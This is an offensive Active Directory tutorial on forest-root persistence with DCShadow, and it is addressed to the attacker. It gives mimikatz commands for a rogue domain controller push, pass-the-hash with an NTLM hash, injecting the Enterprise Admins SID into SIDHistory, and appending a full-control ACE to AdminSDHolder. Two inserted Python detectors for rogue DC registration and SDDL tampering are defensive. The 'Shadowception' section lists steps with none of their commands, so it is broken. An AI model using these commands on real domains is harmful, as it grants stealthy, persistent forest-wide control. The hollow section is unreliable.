Forest Persistence
We are going to discuss some ways to establish persistence in a forest root domain.
DCShadow
DCShadow temporarily registers a new domain controller in the target domain and uses it to push attributes such as SID History, SPNs and others onto the specified object through replication, without leaving change logs for the modified object.
The rogue domain controller is registered by modifying the configuration container and the SPNs of an existing computer object, and by starting a couple of RPC services.
Because the attribute changes arrive from a (rogue) domain controller via replication, the legitimate DC records no change logs for the target object.
By default, domain administrative privileges are required to use DCShadow.
To execute this persistence we need two instances of mimikatz.exe. The first one, running as SYSTEM, starts the RPC servers and specifies the attributes to be modified:

```
!+
!processtoken
lsadump::dcshadow /object:root1user /attribute:Description /value="Hello from DCShadow"
```

The second one, running with domain admin privileges, pushes the change:

```
privilege::debug
sekurlsa::pth /user:Administrator /domain:corp.local /ntlm:71d04f9d50ceb1f64de7a09f23e6dc4c /impersonate
lsadump::dcshadow /push
```
Note: DCShadow can be used with minimal permissions by modifying ACLs. Nishang has a script, Set-DCShadowPermissions, that grants these permissions to a user:

```
Set-DCShadowPermissions -FakeDC machine-user01 -SAMAccountName root1user -Username user01 -Verbose
```
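The registration step described above (configuration container modified, DC-only SPNs added to an existing computer object) is the part of DCShadow that does leave traces, even though the pushed attribute change itself does not. The following Python is an added example written for this page, not code from the original or from mimikatz/Nishang: it scans Windows Security event records for a computer account that is not a known DC receiving the GC/ SPN or the Directory Replication Service SPN class (Event ID 4742, "A computer account was changed"), and for an nTDSDSA object being created under CN=Sites,CN=Configuration (Event ID 5137, "A directory service object was created"). The known-DC inventory and the event records are constructed for the example; the field names follow the EventData of those two events.

```python
"""Flag DCShadow-style rogue DC registration in Windows Security event records.

Added example (not from the original page). Event records are constructed dicts
using the EventData field names of Event IDs 4742 and 5137.
"""
import re

# SPN class used by the Directory Replication Service (Microsoft-documented GUID).
DRS_SPN_GUID = "E3514235-4B06-11D1-AB04-00C04FC2DCD2"

# Assumed inventory of legitimate domain controllers (sAMAccountName of the
# computer objects); constructed for the example.
KNOWN_DC_ACCOUNTS = {"DC01$", "DC02$"}

# nTDSDSA objects of real DCs live here too, so the object class alone is not
# enough: the check is "created here by something that is not the DC itself".
_SITES_DN = re.compile(r"CN=Sites,CN=Configuration,DC=", re.IGNORECASE)


def dc_only_spns(spn_blob):
    """Return the SPNs in a 4742 ServicePrincipalNames field that only a DC should carry."""
    hits = []
    for spn in spn_blob.replace("\r", "").split("\n"):
        spn = spn.strip()
        if not spn:
            continue
        upper = spn.upper()
        if upper.startswith("GC/") or upper.startswith(DRS_SPN_GUID + "/"):
            hits.append(spn)
    return hits


def analyze_events(events, known_dcs=KNOWN_DC_ACCOUNTS):
    """Return (EventID, account or DN, reason) tuples for suspicious records."""
    known = {d.upper() for d in known_dcs}
    alerts = []
    for ev in events:
        eid = ev.get("EventID")
        if eid == 4742:
            target = ev.get("TargetUserName", "")
            spns = dc_only_spns(ev.get("ServicePrincipalNames", ""))
            if spns and target.upper() not in known:
                alerts.append((4742, target,
                               "DC-only SPN(s) on non-DC account: " + ", ".join(spns)))
        elif eid == 5137:
            dn = ev.get("ObjectDN", "")
            if ev.get("ObjectClass", "").lower() == "ntdsdsa" and _SITES_DN.search(dn):
                alerts.append((5137, dn,
                               "nTDSDSA object created by " + ev.get("SubjectUserName", "?")))
    return alerts


# Constructed sample records (not real logs).
SAMPLE_EVENTS = [
    {  # legitimate DC keeping its own DC SPNs: no alert
        "EventID": 4742, "TargetUserName": "DC01$",
        "ServicePrincipalNames": "GC/dc01.corp.local/corp.local\n"
        + DRS_SPN_GUID + "/11111111-2222-3333-4444-555555555555/corp.local",
    },
    {  # workstation account suddenly carrying DC SPNs: registration indicator
        "EventID": 4742, "TargetUserName": "WS01$",
        "ServicePrincipalNames": "HOST/ws01.corp.local\nGC/ws01.corp.local/corp.local\n"
        + DRS_SPN_GUID + "/66666666-7777-8888-9999-000000000000/corp.local",
    },
    {  # NTDS Settings object created for the rogue server in the configuration container
        "EventID": 5137, "ObjectClass": "nTDSDSA", "SubjectUserName": "user01",
        "ObjectDN": "CN=NTDS Settings,CN=WS01,CN=Servers,CN=Default-First-Site-Name,"
                    "CN=Sites,CN=Configuration,DC=corp,DC=local",
    },
    {  # unrelated object creation: no alert
        "EventID": 5137, "ObjectClass": "user", "SubjectUserName": "admin",
        "ObjectDN": "CN=newuser,CN=Users,DC=corp,DC=local",
    },
]

if __name__ == "__main__":
    for alert in analyze_events(SAMPLE_EVENTS):
        print(alert)
```

Run it against exported 4742/5137 records (one dict per event) and treat any hit as a lead to correlate with the replication-related events on the legitimate DCs; the point is that the rogue DC has to announce itself through these objects before it can push anything.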
Set Primary Group ID to Enterprise Admin
Now that we have seen how to overwrite attributes of users, we can change the primary group ID of a user to the ID of the Enterprise Admins or Domain Admins group.
Note: This makes noise, because everyone who runs `net group "Enterprise Admins" /domain` will see that the user user01 is a member.
Change SIDHistory of a user
We can modify the SIDHistory of a user with the SID of the Enterprise Admins group in order to obtain full control of the forest:

```
lsadump::dcshadow /object:user /attribute:SIDHistory /value:S-1-5-21-280534878-1496970234-700767426-519
```
Modify ntSecurityDescriptor for AdminSDHolder
We can modify the ntSecurityDescriptor of AdminSDHolder to add full control for a user. First read the current security descriptor as SDDL:

```
(New-Object System.DirectoryServices.DirectoryEntry("LDAP://CN=AdminSDHolder,CN=System,DC=corp,DC=local")).psbase.ObjectSecurity.sddl
```

Then push the modified descriptor:

```
lsadump::dcshadow /object:CN=AdminSDHolder,CN=System,DC=corp,DC=local /attribute:ntSecurityDescriptor /value:<MODIFIED ACL>
```

Modified ACL: the original ACL plus full control for our user, i.e. the original SDDL with this ACE appended:

```
....(A;;CCDCLCSWRPWPLOCRSDRCWDWO;;;S-1-5-21-560323961-2315414123-15432421423-1323)
```

Note: We just need to add our SID to the ACE that SY/BA/DA already have. To see the SID we can use:

```
Get-NetUser user01
```
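Because the change replicates in without a change log on the legitimate DC, the practical check is to audit the AdminSDHolder descriptor itself rather than wait for an event. The following Python is an added example for this page, not code from the original: it parses the DACL portion of an SDDL string into its ACEs (the standard `(type;flags;rights;object_guid;inherit_guid;trustee)` form), and reports any access-allowed ACE that grants takeover rights (GA, WD, WO or WP) to a trustee outside the expected set. The expected-trustee set, the baseline SDDL and the split of rights into two-letter tokens are assumptions made here; the appended ACE is the one shown on the page.

```python
"""Audit an AdminSDHolder-style SDDL string for ACEs that grant control to
unexpected trustees.

Added example (not from the original page). The baseline descriptor and the
expected-trustee set are constructed for the example.
"""
import re

ACE_RE = re.compile(r"\(([^)]*)\)")

# SDDL rights that let the holder take over the object (assumed set for the check).
CONTROL_RIGHTS = {"GA", "WD", "WO", "WP"}

# Trustees expected to hold full control on AdminSDHolder (well-known SDDL aliases).
EXPECTED_CONTROL_TRUSTEES = {"SY", "BA", "DA", "EA"}


def parse_rights(rights):
    """Split an SDDL rights string into two-letter tokens, or keep a hex mask as-is."""
    rights = rights.strip()
    if rights.upper().startswith("0X"):
        return {rights.upper()}
    return {rights[i:i + 2].upper() for i in range(0, len(rights), 2)}


def parse_dacl(sddl):
    """Return a dict per ACE in the DACL ('D:' section) of an SDDL string."""
    start = sddl.find("D:")
    if start < 0:
        return []
    body = sddl[start + 2:]
    end = body.find("S:")          # SACL section, if present, follows the DACL
    if end >= 0:
        body = body[:end]
    aces = []
    for raw in ACE_RE.findall(body):
        parts = raw.split(";")
        if len(parts) < 6:
            continue               # malformed ACE: skip rather than misreport
        aces.append({
            "type": parts[0], "flags": parts[1], "rights": parse_rights(parts[2]),
            "object_guid": parts[3], "inherit_guid": parts[4], "trustee": parts[5],
        })
    return aces


def unexpected_control_aces(sddl, expected=EXPECTED_CONTROL_TRUSTEES):
    """Return access-allowed ACEs granting control rights to trustees outside `expected`."""
    return [ace for ace in parse_dacl(sddl)
            if ace["type"] == "A"
            and ace["rights"] & CONTROL_RIGHTS
            and ace["trustee"] not in expected]


# Constructed baseline: owner/group DA, protected auto-inherited DACL with the
# usual SY/DA/BA full-control ACEs and read for Authenticated Users.
BASELINE_SDDL = ("O:DAG:DAD:PAI"
                 "(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;SY)"
                 "(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)"
                 "(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;BA)"
                 "(A;;LCRPLORC;;;AU)")

# The baseline with the page's appended ACE for a plain domain user SID.
MODIFIED_SDDL = BASELINE_SDDL + \
    "(A;;CCDCLCSWRPWPLOCRSDRCWDWO;;;S-1-5-21-560323961-2315414123-15432421423-1323)"

if __name__ == "__main__":
    print("baseline:", unexpected_control_aces(BASELINE_SDDL))
    for ace in unexpected_control_aces(MODIFIED_SDDL):
        print("unexpected:", ace["trustee"], sorted(ace["rights"]))
```

Feed it the SDDL string read from the object (the same value the `ObjectSecurity.sddl` property returns) and compare against a stored baseline; a new trustee with WD/WO/WP on AdminSDHolder is exactly the footprint the modification above leaves.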
Shadowception
We can even run DCShadow from DCShadow. To do that we will add the following ACLs, starting by listing the current ACL of the domain object:

```
(New-Object System.DirectoryServices.DirectoryEntry("LDAP://DC=corp,DC=local")).psbase.ObjectSecurity.sddl
```

Note: We can use /stack to stack multiple ACLs.
Domain Object
- List ACL:
- Append the following ACE:
- Stack the ACL
Attacker Computer Object
- List ACL:
- Append the following ACE:
- Stack the ACL
Target User Object
- List ACL:
- Append the following ACE:
- Stack the ACL
Sites Configuration Object
- List ACL:
- Append the following ACE:
- Stack the ACL
Finally we just start the server:
And on the other session with DA privileges: